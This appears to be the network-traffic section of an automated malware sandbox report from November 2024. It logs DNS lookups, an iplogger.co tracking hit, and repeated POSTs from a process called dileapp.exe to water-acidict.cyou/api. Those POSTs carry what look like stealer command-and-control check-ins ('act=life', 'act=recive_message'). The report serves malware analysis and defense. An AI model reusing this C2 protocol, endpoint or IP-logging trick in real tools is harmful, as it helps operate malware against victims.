                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 29, 2024 23:09:59.252136946 CET1.1.1.1192.168.2.40x284dNo error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:09:59.252136946 CET1.1.1.1192.168.2.40x284dNo error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:09:59.361128092 CET1.1.1.1192.168.2.40x5816No error (0)iplogger.co65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:01.807292938 CET1.1.1.1192.168.2.40x771aNo error (0)water-acidict.cyou172.67.156.217A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:01.807292938 CET1.1.1.1192.168.2.40x771aNo error (0)water-acidict.cyou104.21.8.50A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.489132881 CET1.1.1.1192.168.2.40xc8cfNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.489276886 CET1.1.1.1192.168.2.40x98f0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.538033962 CET1.1.1.1192.168.2.40x812eNo error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.538033962 CET1.1.1.1192.168.2.40x812eNo error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:10:03.541260004 CET1.1.1.1192.168.2.40x83e1No error (0)iplogger.co65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:11:03.531680107 CET1.1.1.1192.168.2.40x97f9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                      Nov 29, 2024 23:11:03.532004118 CET1.1.1.1192.168.2.40xb0f2No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • iplogger.co
                                                                                                                                      • https:
                                                                                                                                      • water-acidict.cyou
                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                      • otelrules.azureedge.net

                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449733172.67.167.2494435500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:00 UTC660OUTGET /1tJFB4 HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-11-29 22:10:01 UTC1363INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:01 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: 56396975137264100=3; expires=Sat, 29 Nov 2025 22:10:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      Set-Cookie: clhf03028ja=8.46.123.228; expires=Sat, 29 Nov 2025 22:10:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      memory: 0.47846221923828125
                                                                                                                                      expires: Fri, 29 Nov 2024 22:10:01 +0000
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFZln0cyw%2F7SBxvm1t26jQaV9lQGusgYpNEhWfuny8%2Bj861sRF9Eo%2BjksMJK%2FqvzxujF64Aitk%2FiMFZZJQaaM5QdJnmVPA5u8lbXYTnc30%2FxNfgo56CsLi8QD9fKsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ece4ac65c34f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1674&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1238&delivery_rate=1703617&cwnd=181&unsent_bytes=0&cid=94a26576f0a91552&ts=1000&x=0"
                                                                                                                                      2024-11-29 22:10:01 UTC6INData Raw: 37 34 0d 0a 89 50
                                                                                                                                      Data Ascii: 74P
                                                                                                                                      2024-11-29 22:10:01 UTC116INData Raw: 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                      Data Ascii: NGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                      2024-11-29 22:10:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449737172.67.167.2494435500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:02 UTC639OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://iplogger.co/1tJFB4
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                                                                                                                                      2024-11-29 22:10:03 UTC1084INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:03 GMT
                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                      Content-Length: 2833
                                                                                                                                      Connection: close
                                                                                                                                      last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                      etag: "629f3a26-b11"
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 4311
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xdqiGY7ZdsjggARHW4qzluDJZKX5taUB8SrvHgJpvPUeae5itTL46HMDYdznzoY7veuAvqqHjb2AD%2BAga4OWGTQJKp3%2BOQigXKqUc38ZW4mHFp9rWPoM5GFwoYJww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ecf17b13efa5-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1958&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1217&delivery_rate=1435594&cwnd=193&unsent_bytes=0&cid=e1559da315ba76ff&ts=452&x=0"
                                                                                                                                      2024-11-29 22:10:03 UTC285INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                                      Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                                      2024-11-29 22:10:03 UTC1369INData Raw: c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1
                                                                                                                                      Data Ascii: V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp|
                                                                                                                                      2024-11-29 22:10:03 UTC1179INData Raw: 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70
                                                                                                                                      Data Ascii: +CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=|ck`1Lzv_7iv[b1;l.$|4 iG6p,RY3dA/F0p


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449738172.67.156.2174433696C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:03 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:04 UTC1018INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:03 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=v4718kfuq5urol859qmsertkhd; expires=Tue, 25-Mar-2025 15:56:42 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQQPc43jlPEABo9wTNg%2B5algCjrmevPyT8TkLyWBioX5%2BxVRIf6dHGeoALd%2FRNr59SvxRWUNwOM0OIQeRyZoYI4k%2FUSPW0SR6UwclalVscmGx7gSjaAI9ruhySXrkhgVtPYOJGw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ecf3da2b41c6-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2170&min_rtt=2167&rtt_var=820&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1329085&cwnd=199&unsent_bytes=0&cid=77219084503b4050&ts=1070&x=0"
                                                                                                                                      2024-11-29 22:10:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449744104.21.82.934435500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:06 UTC401OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: iplogger.co
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: 56396975137264100=3; clhf03028ja=8.46.123.228
                                                                                                                                      2024-11-29 22:10:06 UTC1088INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:06 GMT
                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                      Content-Length: 2833
                                                                                                                                      Connection: close
                                                                                                                                      last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                      etag: "629f3a26-b11"
                                                                                                                                      strict-transport-security: max-age=604800
                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                      content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 4314
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h07w4hmxQ1EC6UYfThmq1%2Bb8WH%2BPe7%2BMxMM8E1P%2FjPJ8vxpHe0pIq4FmA%2F7Kr9VgiDKdRmKVrQlFpIOHxjwmTnhGH44hmZARDnIAUyZLgrBextrP9H0opHwwwppL7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed05ac51f791-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1632&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=979&delivery_rate=1789215&cwnd=65&unsent_bytes=0&cid=42f10a17eb9dc843&ts=462&x=0"
                                                                                                                                      2024-11-29 22:10:06 UTC281INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                                      Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                                      2024-11-29 22:10:06 UTC1369INData Raw: 80 39 de dd c0 d5 c0 c5 c0 d2 56 8c 8b 30 e9 58 e0 9b c0 16 60 28 96 d3 0f 00 a9 54 48 1d 69 d5 03 e6 04 6f 3a bf 04 b8 17 f8 27 70 33 ad 5b fc 4c 78 10 71 fa 31 90 8d e5 f4 96 58 4e 2f 6a c5 a0 4d c1 9b ce b7 79 d3 f9 2b 81 7f 00 d7 21 72 bd 50 e8 06 1e 00 de 88 e5 f4 a9 46 91 36 85 a6 18 e0 4d e7 57 00 2f 22 bb 51 4b c6 17 02 ab 80 3f 02 f7 c5 72 ba a9 0d b0 66 80 37 9d 3f 07 d1 d0 a7 37 f3 c0 79 40 1b f0 2d 60 20 96 d3 c7 da 12 bb 66 80 37 9d f7 78 d3 f9 eb 80 df f2 d1 ee 7a 2d 9c 08 bc 16 cb e9 75 36 44 ae 18 e0 4d e7 3d c0 36 44 d9 f9 ec e7 b6 60 58 02 fc 3e 96 d3 e7 b8 d5 0b 0d 19 60 16 7f 1b d0 3f b7 b9 2d 18 da 81 a7 81 73 dc dc 5c 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc
                                                                                                                                      Data Ascii: 9V0X`(THio:'p3[Lxq1XN/jMy+!rPF6MW/"QK?rf7?7y@-` f7xz-u6DM=6D`X>`?-s\_Vc&rzM9BdJp
                                                                                                                                      2024-11-29 22:10:06 UTC1183INData Raw: 3a 3f c6 47 2b 06 43 54 42 67 9b 68 10 24 7d 7f d4 6c bc 62 49 bc d9 5c 73 c0 33 96 b4 ad c4 7d c5 4c a2 6c 5a 65 dc e6 11 41 ac c6 34 06 bc 4e c5 94 b8 c1 05 de 74 be db c8 de 36 ea 87 ad f3 85 21 20 65 be af 03 56 58 d0 be 8d d1 7b 1e 90 86 45 84 09 6e d1 01 6c f5 a6 f3 14 33 89 bd c0 76 0b da 56 60 0a b8 a6 98 49 38 8c 7f 09 38 1f 78 d7 25 fd b3 4e 99 ac da 73 7a dc 72 12 97 00 9f 31 df b7 21 95 97 85 c2 76 60 67 b2 a0 49 16 b4 2f 15 52 e5 54 48 3d 03 7c 1a b8 09 63 e3 6b 60 0a c9 31 00 d3 19 b0 a3 01 e1 4c f8 80 9f 7a d3 f9 76 b3 13 5f 01 f6 37 a0 69 05 76 00 5b 8d f8 ad 02 b2 c9 82 de 62 18 31 9e 0a a9 3b 81 e3 90 8c d1 6c 0e de 2e 24 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e
                                                                                                                                      Data Ascii: :?G+CTBgh$}lbI\s3}LlZeA4Nt6! eVX{Enl3vV`I88x%Nszr1!v`gI/RTH=|ck`1Lzv_7iv[b1;l.$|4 iG6p,RY3dA/F0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449746172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:09 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:10 UTC1021INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:09 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=p7k9v6aiofrpj0lts098knj4cc; expires=Tue, 25-Mar-2025 15:56:48 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QDBRvhAsgsbOAo1B%2FwvwbrbypRSyffUi88j7%2BcIErL2m18uTFuYulkUPMEcBLEZjW6d0G4MaFFcldGAmUpBWh7r%2FJDLto%2F4whqxoNvTmCRn%2BKghzpKESQVPN6ohOY73U%2BZO5x0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed1a18de727a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2045&rtt_var=1022&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4228&recv_bytes=909&delivery_rate=101069&cwnd=217&unsent_bytes=0&cid=9c4edfc845aff7fb&ts=870&x=0"
                                                                                                                                      2024-11-29 22:10:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449747172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:11 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:11 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
                                                                                                                                      2024-11-29 22:10:12 UTC1013INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:12 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=gm1b74lmrmcue21kc8nc0usao3; expires=Tue, 25-Mar-2025 15:56:51 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRhfOeYsiXFmf6iDnPi5zm8FqOj3ZB5YuPrLNxvgUpAR5FsgSwFAopewiYw0wtMHQyi6Hbo5KeXiiBYuFn%2BfFCOD8VfggiNJX9J5XkmzLt75gqPmOdFdSnrUTYmLcP%2FuKsiC0EQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed27bda68c83-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1832&min_rtt=1830&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1580942&cwnd=189&unsent_bytes=0&cid=3c2d3e9169e9632e&ts=812&x=0"
